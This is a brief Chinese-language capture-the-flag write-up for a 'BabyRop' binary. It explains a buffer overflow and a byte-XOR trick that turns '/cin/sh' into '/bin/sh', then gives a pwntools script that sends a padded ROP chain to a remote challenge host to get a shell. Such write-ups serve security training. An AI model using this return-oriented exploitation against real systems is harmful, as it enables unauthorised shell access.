显然没开啥保护
显然就是个溢出。
显然是个后门函数
显然作用是能把一个字节与异或一个1
显然有个字符/cin/sh
显然用函数2能把/cin/sh变成/bin/sh。
就一套rop带走就行。
exp
from pwn import*
r = remote("192.168.39.35", 11000)
elf = ELF("./BabyRop")
payload = 'a' * 44 + p32(0x80491fd) + p32(0x8049332) + p32(0x804c024) + p32(1) + p32(0x80491d6) * 2 + p32(0x804c024)
r.sendline(payload)
r.interactive()